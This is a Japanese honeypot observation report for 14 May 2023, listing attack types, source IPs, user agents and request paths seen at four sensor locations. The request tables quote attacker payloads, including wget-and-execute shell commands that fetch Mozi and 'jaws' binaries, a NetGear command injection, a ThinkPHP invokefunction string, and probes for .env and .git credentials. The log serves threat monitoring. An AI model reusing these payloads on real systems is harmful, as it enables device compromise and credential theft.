ハニーポット(仮) 観測記録 2023/05/14分です。
特徴
共通
GPONルータの脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為
Apache Tomcatへのスキャン行為
Location:JP
.jsへのスキャン行為
.sqlへのスキャン行為
/.gitへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
Location:US
D-link製品の脆弱性を狙うアクセス
JBossの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.gitへのスキャン行為
Laravelへのスキャン行為
Gh0stRATのような動き
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 5.255.111.128/jaws; sh /tmp/jaws
Location:UK
D-link製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http://192.168.1.1:8088/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:SG
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
/.gitへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
他
アクセス数推移
JP:総アクセス数:183 (前日比:81)
US:総アクセス数:115 (前日比:34)
UK:総アクセス数:103 (前日比:20)
SG:総アクセス数:111 (前日比:13)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 20.14.17.165 | United States |
1 | 27.124.12.16 | Singapore |
18 | 43.154.141.71 | Singapore |
84 | 44.202.116.96 | United States |
1 | 45.8.22.79 | Spain |
1 | 45.56.108.128 | United States |
1 | 45.79.181.94 | United States |
1 | 45.79.181.223 | United States |
2 | 87.121.221.49 | Bulgaria |
1 | 103.38.237.172 | China |
1 | 103.41.36.207 | India |
1 | 103.116.52.146 | private ip address |
1 | 104.28.249.52 | United States |
2 | 104.192.0.50 | United States |
1 | 107.170.226.16 | United States |
1 | 107.170.249.23 | United States |
2 | 109.237.97.180 | Russia |
2 | 109.237.98.226 | Russia |
2 | 134.209.109.211 | United States |
8 | 135.125.217.54 | France |
8 | 135.125.244.48 | France |
1 | 141.98.6.151 | Bulgaria |
1 | 143.110.166.238 | United States |
7 | 167.172.86.0 | United States |
1 | 167.248.133.38 | United States |
1 | 167.248.133.124 | United States |
3 | 170.64.156.160 | United States |
4 | 172.104.11.34 | United States |
2 | 172.104.11.46 | United States |
1 | 172.104.11.51 | United States |
1 | 172.104.242.173 | United States |
1 | 181.214.242.56 | United States |
1 | 183.222.242.4 | China |
6 | 185.254.196.173 | Ukraine |
2 | 185.254.196.186 | Ukraine |
7 | 188.166.190.135 | United States |
1 | 192.155.90.220 | United States |
1 | 198.199.109.43 | United States |
1 | 198.235.24.128 | United States |
1 | 205.210.31.175 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
28 | - |
2 | Go-http-client/1.1 |
1 | Hello, World |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36 |
3 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36 |
3 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 |
3 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 |
18 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 |
10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 |
3 | Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 |
6 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 |
4 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36 |
3 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 |
3 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 |
4 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 |
3 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 |
3 | Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 |
3 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F |
2 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 |
29 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36 |
4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 |
5 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
1 | Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 |
3 | Mozilla/5.0 zgrab/0.x |
3 | Mozilla/5.0 |
1 | python-requests/2.28.2 |
1 | python-requests/2.30.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_18.179.20.5_80\n |
||
2 | \x16\x03\x01\x01H\x01 |
||
20 | \x16\x03\x01 |
||
1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 |
X\xd4>\x12\x98\xc4<\xe0\x13\xcf | |
1 | GET | /.chef/config.rb |
HTTP/1.1 |
1 | GET | /.env.18.179 |
HTTP/1.1 |
1 | GET | /.env.20 |
HTTP/1.1 |
1 | GET | /.env.backup |
HTTP/1.1 |
1 | GET | /.env.bak |
HTTP/1.1 |
1 | GET | /.env.dev.local |
HTTP/1.1 |
1 | GET | /.env.dev |
HTTP/1.1 |
1 | GET | /.env.development.local |
HTTP/1.1 |
1 | GET | /.env.live |
HTTP/1.1 |
1 | GET | /.env.local |
HTTP/1.1 |
1 | GET | /.env.old |
HTTP/1.1 |
1 | GET | /.env.prod.local |
HTTP/1.1 |
1 | GET | /.env.prod |
HTTP/1.1 |
1 | GET | /.env.production.local |
HTTP/1.1 |
1 | GET | /.env.production |
HTTP/1.1 |
1 | GET | /.env.save |
HTTP/1.1 |
1 | GET | /.env.stage |
HTTP/1.1 |
1 | GET | /.env.www |
HTTP/1.1 |
1 | GET | /.env_1 |
HTTP/1.1 |
1 | GET | /.env_sample |
HTTP/1.1 |
32 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git-credentials |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /1.sql |
HTTP/1.1 |
1 | GET | /18[.]179[.]20[.]5:80.sql |
HTTP/1.1 |
1 | GET | /18[.]179[.]20[.]5:80_db.sql |
HTTP/1.1 |
1 | GET | /Dockerrun.aws.json |
HTTP/1.1 |
1 | GET | /actuator/health |
HTTP/1.1 |
1 | GET | /api/.env |
HTTP/1.1 |
1 | GET | /api/.git/config |
HTTP/1.1 |
1 | GET | /app/.git/config |
HTTP/1.1 |
1 | GET | /assets../.git/config |
HTTP/1.1 |
1 | GET | /assets/config.rb |
HTTP/1.1 |
1 | GET | /backend/.git/config |
HTTP/1.1 |
1 | GET | /backup.sql |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=adminisp&psd=adminisp |
HTTP/1.0 |
1 | GET | /cdn-cgi/trace |
HTTP/1.1 |
1 | GET | /cgi-bin/printenv.pl |
HTTP/1.1 |
2 | GET | /client/get_targets |
HTTP/1.1 |
1 | GET | /config.json |
HTTP/1.1 |
1 | GET | /config.rb |
HTTP/1.1 |
1 | GET | /config/config.json |
HTTP/1.1 |
1 | GET | /config/default.json |
HTTP/1.1 |
1 | GET | /content../.git/config |
HTTP/1.1 |
1 | GET | /credentials/config.json |
HTTP/1.1 |
1 | GET | /css../.git/config |
HTTP/1.1 |
1 | GET | /data.sql |
HTTP/1.1 |
1 | GET | /database.sql |
HTTP/1.1 |
1 | GET | /db.sql |
HTTP/1.1 |
1 | GET | /db_backup.sql |
HTTP/1.1 |
1 | GET | /dbdump.sql |
HTTP/1.1 |
1 | GET | /docker-compose-dev.yml |
HTTP/1.1 |
1 | GET | /docker-compose.dev.yml |
HTTP/1.1 |
1 | GET | /docker-compose.override.yml |
HTTP/1.1 |
1 | GET | /docker-compose.prod.yml |
HTTP/1.1 |
1 | GET | /docker-compose.production.yml |
HTTP/1.1 |
1 | GET | /docker-compose.staging.yml |
HTTP/1.1 |
1 | GET | /docker-compose.yml |
HTTP/1.1 |
1 | GET | /dump.sql |
HTTP/1.1 |
1 | GET | /env.dev.js |
HTTP/1.1 |
1 | GET | /env.development.js |
HTTP/1.1 |
1 | GET | /env.js |
HTTP/1.1 |
1 | GET | /env.prod.js |
HTTP/1.1 |
1 | GET | /env.production.js |
HTTP/1.1 |
1 | GET | /env.test.js |
HTTP/1.1 |
1 | GET | /events../.git/config |
HTTP/1.1 |
4 | GET | /favicon.ico |
HTTP/1.1 |
2 | GET | /geoip/ |
HTTP/1.1 |
1 | GET | /images../.git/config |
HTTP/1.1 |
1 | GET | /img../.git/config |
HTTP/1.1 |
1 | GET | /js../.git/config |
HTTP/1.1 |
1 | GET | /lib../.git/config |
HTTP/1.1 |
1 | GET | /localhost.sql |
HTTP/1.1 |
3 | GET | /manager/html |
HTTP/1.1\n |
1 | GET | /media../.git/config |
HTTP/1.1 |
1 | GET | /mysql.sql |
HTTP/1.1 |
1 | GET | /mysqldump.sql |
HTTP/1.1 |
1 | GET | /portal/redlion |
HTTP/1.1 |
1 | GET | /sendgrid.env |
HTTP/1.1 |
1 | GET | /site.sql |
HTTP/1.1 |
1 | GET | /sql.sql |
HTTP/1.1 |
1 | GET | /static../.git/config |
HTTP/1.1 |
1 | GET | /systembc/ |
HTTP/1.1 |
1 | GET | /systembc/password.php |
HTTP/1.0 |
1 | GET | /temp.sql |
HTTP/1.1 |
1 | GET | /translate.sql |
HTTP/1.1 |
2 | GET | /upl.php |
HTTP/1.1 |
1 | GET | /users.sql |
HTTP/1.1 |
2 | GET | /v3/time |
HTTP/1.1 |
1 | GET | /web/.git/config |
HTTP/1.1 |
1 | GET | /wp-content/mysql.sql |
HTTP/1.1 |
1 | GET | /wp-content/uploads/dump.sql |
HTTP/1.1 |
1 | GET | /xkyyy/145705-1-1.html |
HTTP/1.1 |
18 | HEAD | /Core/Skin/Login.aspx |
HTTP/1.1 |
1 | HEAD | / |
HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
1 | POST | /admin/login/?next=/admin/ |
HTTP/1.1 |
5 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 5.180.209.49 | United Kingdom |
1 | 14.233.13.64 | Vietnam |
1 | 14.234.244.188 | Vietnam |
4 | 20.55.58.5 | United States |
1 | 27.43.204.211 | China |
1 | 27.124.12.16 | Singapore |
3 | 43.158.216.231 | Singapore |
3 | 45.33.80.243 | United States |
1 | 45.79.128.205 | United States |
1 | 45.79.181.104 | United States |
1 | 45.79.181.179 | United States |
2 | 45.79.181.223 | United States |
1 | 45.128.232.121 | Bulgaria |
8 | 45.240.88.205 | Egypt |
17 | 51.79.29.48 | Canada |
2 | 66.175.213.4 | United States |
1 | 66.240.205.34 | United States |
3 | 87.121.221.49 | Bulgaria |
1 | 103.116.52.146 | private ip address |
5 | 103.169.35.15 | Vietnam |
1 | 107.170.249.12 | United States |
2 | 109.237.98.226 | Russia |
7 | 134.122.48.209 | United States |
1 | 142.93.39.16 | United States |
2 | 142.147.96.167 | Canada |
1 | 143.110.166.228 | United States |
1 | 147.78.130.16 | Germany |
2 | 152.89.196.144 | Russia |
1 | 159.100.30.68 | Germany |
2 | 162.142.125.223 | United States |
2 | 162.142.125.225 | United States |
7 | 164.92.152.45 | United States |
2 | 167.94.138.33 | United States |
2 | 167.94.146.58 | United States |
8 | 170.64.156.160 | United States |
1 | 172.104.11.46 | United States |
1 | 172.104.131.24 | United States |
1 | 172.105.128.11 | United States |
1 | 179.43.177.243 | Panama |
1 | 185.168.9.58 | Germany |
1 | 185.168.9.59 | Germany |
1 | 192.155.90.220 | United States |
1 | 192.241.227.19 | United States |
2 | 193.35.18.65 | Bulgaria |
2 | 194.165.16.78 | Panama |
1 | 198.20.101.86 | United States |
1 | 198.199.100.111 | United States |
1 | 205.210.31.74 | United States |
1 | 212.224.93.108 | Germany |
UserAgent一覧
件数 | UserAgent |
---|---|
45 | - |
1 | Bing |
4 | Go-http-client/1.1 |
2 | Mozila/5.0 |
1 | Mozilla/5.0 (Linux; Android 12; I2126) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
8 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 |
29 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
6 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
4 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
1 | Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 |
3 | Mozilla/5.0 zgrab/0.x |
2 | Mozilla/5.0 |
1 | portalmmm/2.0 N410i(c20;TB) |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - |
||
1 | Gh0st\xad |
||
1 | MGLNDD_34.68.118.83_80\n |
||
2 | \x03 |
||
1 | \x16\x03\x01\x01H\x01 |
||
1 | \x16\x03\x01\x01\xfb\x01 |
||
21 | \x16\x03\x01 |
||
1 | \xff\xa2\xff |
||
1 | o\xfa\xc0\xbe\xb8\xc0\xa4\xc9\x89\xa2\xc2\x8f\x83\xaf\x91\x97\xbe\xcd\xb9\xcf\xac\x9b\xb0\xab\xa0\xb6\xb1\xaa\x9d\x9c\x9f\x96\x8d\x93\xce\xb4\xb3\xb5\x98\xcd\xa6\xfa\xfa\xfa\xfa\x12\xfd\xd8\xf8\xfa\xfa\xc2\xfa\xfa\xfa\xfa\x1af\xec\xf9\xfa\xfa\xfa\xfa\xfb\xe5q\xf2\xfa\xfa\xfa\xfa\xfa\xfa\xf9wh\x97ui\xba\xea=E\xf0\x1b/\xa7XJ\xf11Y\v\xbf\xb1K\x1f |
||
1 | GET | /.env |
HTTP/1.0 |
29 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.0 |
1 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=bmtddssn |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /actuator/health |
HTTP/1.1 |
1 | GET | /card |
HTTP/1.1 |
2 | GET | /client/get_targets |
HTTP/1.1 |
1 | GET | /docker-compose.yml |
HTTP/1.1 |
6 | GET | /favicon.ico |
HTTP/1.1 |
2 | GET | /geoip/ |
HTTP/1.1 |
1 | GET | /hudson |
HTTP/1.1 |
1 | GET | /invoker/readonly |
HTTP/1.1 |
1 | GET | /jenkins/login |
HTTP/1.1 |
1 | GET | /login |
HTTP/1.1 |
8 | GET | /manager/html |
HTTP/1.1\n |
1 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /metrics |
HTTP/1.0 |
1 | GET | /script |
HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 5.255.111.128/jaws;sh+/tmp/jaws |
|
1 | GET | /systembc/ |
HTTP/1.1 |
2 | GET | /upl.php |
HTTP/1.1 |
1 | GET | /v2/ |
HTTP/1.0 |
1 | GET | /xkyyy/145705-1-1.html |
HTTP/1.1 |
2 | POST | /HNAP1/ |
HTTP/1.1 |
1 | POST | /_ignition/execute-solution |
HTTP/1.1 |
6 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
4 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
33 | 20.84.58.190 | United States |
1 | 45.8.145.120 | Russia |
1 | 45.12.253.248 | Bulgaria |
2 | 45.33.80.243 | United States |
2 | 45.79.181.104 | United States |
2 | 45.79.181.223 | United States |
1 | 45.79.181.251 | United States |
1 | 45.227.254.48 | Belize |
1 | 49.143.32.6 | South Korea |
11 | 51.79.29.48 | Canada |
1 | 51.159.164.227 | France |
8 | 54.37.79.75 | France |
3 | 87.121.221.49 | Bulgaria |
1 | 103.38.237.172 | China |
1 | 103.116.52.146 | private ip address |
2 | 109.237.97.180 | Russia |
2 | 109.237.98.226 | Russia |
1 | 115.248.198.106 | India |
1 | 117.216.29.104 | India |
1 | 138.68.143.228 | United States |
1 | 147.182.167.254 | United States |
2 | 152.89.196.144 | Russia |
2 | 167.94.138.33 | United States |
5 | 170.64.156.160 | United States |
1 | 172.104.11.4 | United States |
3 | 172.104.11.34 | United States |
1 | 172.104.131.24 | United States |
1 | 172.105.128.12 | United States |
1 | 179.43.177.243 | Panama |
1 | 188.166.169.26 | United States |
1 | 192.241.195.37 | United States |
1 | 193.35.18.65 | Bulgaria |
1 | 194.110.84.214 | Germany |
1 | 194.165.16.37 | Panama |
1 | 198.199.104.82 | United States |
1 | 198.199.109.99 | United States |
1 | 198.235.24.120 | United States |
1 | 205.210.31.23 | United States |
1 | 222.137.198.134 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
29 | - |
1 | Bing |
1 | Hello, world |
1 | Mozila/5.0 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 |
33 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 |
23 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0 |
6 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
4 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | \x03 |
||
2 | \x16\x03\x01\x01H\x01 |
||
2 | \x16\x03\x01\x01\xfc\x01 |
||
14 | \x16\x03\x01 |
||
24 | GET | /.env |
HTTP/1.1 |
1 | GET | /132.145.66.34/.env |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /actuator/health |
HTTP/1.1 |
1 | GET | /admin/.env |
HTTP/1.1 |
1 | GET | /api/.env |
HTTP/1.1 |
1 | GET | /app/.env |
HTTP/1.1 |
1 | GET | /app/config/.env |
HTTP/1.1 |
1 | GET | /apps/.env |
HTTP/1.1 |
1 | GET | /audio/.env |
HTTP/1.1 |
1 | GET | /backend/.env |
HTTP/1.1 |
1 | GET | /base/.env |
HTTP/1.1 |
1 | GET | /blog/.env |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=adminisp&psd=adminisp |
HTTP/1.0 |
1 | GET | /card |
HTTP/1.1 |
1 | GET | /cgi-bin/.env |
HTTP/1.1 |
1 | GET | /conf/.env |
HTTP/1.1 |
1 | GET | /core/.env |
HTTP/1.1 |
1 | GET | /crm/.env |
HTTP/1.1 |
1 | GET | /database/.env |
HTTP/1.1 |
2 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /hudson |
HTTP/1.1 |
1 | GET | /laravel/.env |
HTTP/1.1 |
1 | GET | /library/.env |
HTTP/1.1 |
1 | GET | /local/.env |
HTTP/1.1 |
5 | GET | /manager/html |
HTTP/1.1\n |
1 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /new/.env |
HTTP/1.1 |
1 | GET | /newsite/.env |
HTTP/1.1 |
1 | GET | /old/.env |
HTTP/1.1 |
1 | GET | /portal/redlion |
HTTP/1.1 |
1 | GET | /protected/.env |
HTTP/1.1 |
1 | GET | /public/.env |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws |
HTTP/1.1 |
1 | GET | /sites/all/libraries/mailchimp/.env |
HTTP/1.1 |
1 | GET | /src/.env |
HTTP/1.1 |
1 | GET | /storage/.env |
HTTP/1.1 |
1 | GET | /systembc/ |
HTTP/1.1 |
1 | GET | /vendor/.env |
HTTP/1.1 |
1 | GET | /vendor/laravel/.env |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /wp-admin/.env |
HTTP/1.1 |
1 | GET | /wp-content/.env |
HTTP/1.1 |
1 | GET | /www/.env |
HTTP/1.1 |
1 | GET | http[:]//dyn[.]epicgifs[.]net/test6956.php |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.0 |
1 | POST | /HNAP1/ |
HTTP/1.1 |
6 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | PRI | * |
HTTP/2.0 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 8.45.47.77 | United States |
1 | 20.126.12.216 | United States |
1 | 45.12.253.248 | Bulgaria |
1 | 45.56.108.128 | United States |
2 | 45.79.128.205 | United States |
1 | 45.79.172.21 | United States |
1 | 45.79.181.94 | United States |
2 | 45.79.181.251 | United States |
18 | 51.79.29.48 | Canada |
3 | 87.121.221.49 | Bulgaria |
1 | 87.251.64.11 | Russia |
4 | 94.102.49.193 | United Kingdom |
6 | 95.214.27.62 | Bulgaria |
1 | 103.38.237.172 | China |
1 | 103.83.144.161 | India |
1 | 103.116.52.146 | private ip address |
2 | 104.215.76.202 | United States |
1 | 107.170.237.12 | United States |
2 | 109.237.97.180 | Russia |
2 | 109.237.98.226 | Russia |
1 | 134.122.135.178 | Singapore |
1 | 139.59.120.208 | Singapore |
1 | 141.98.6.145 | Bulgaria |
1 | 141.98.6.151 | Bulgaria |
1 | 149.129.50.37 | Singapore |
2 | 152.89.196.144 | Russia |
1 | 159.65.87.128 | United States |
1 | 161.35.233.14 | United States |
2 | 162.142.125.11 | United States |
2 | 162.142.125.216 | United States |
2 | 167.94.138.33 | United States |
1 | 167.172.106.138 | United States |
2 | 167.248.133.38 | United States |
9 | 170.64.156.160 | United States |
1 | 172.104.11.46 | United States |
1 | 172.104.131.24 | United States |
1 | 172.104.242.173 | United States |
3 | 172.105.128.11 | United States |
1 | 172.105.128.13 | United States |
2 | 179.43.177.243 | Panama |
8 | 185.180.143.80 | Portugal |
1 | 192.155.90.220 | United States |
1 | 193.35.18.65 | Bulgaria |
2 | 194.165.16.37 | Panama |
1 | 198.199.112.107 | United States |
1 | 198.199.116.50 | United States |
1 | 198.235.24.113 | United States |
1 | 205.210.31.135 | United States |
7 | 206.189.56.44 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
47 | - |
1 | Bing |
1 | Hello, World |
1 | Mozila/5.0 |
1 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 |
3 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
8 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
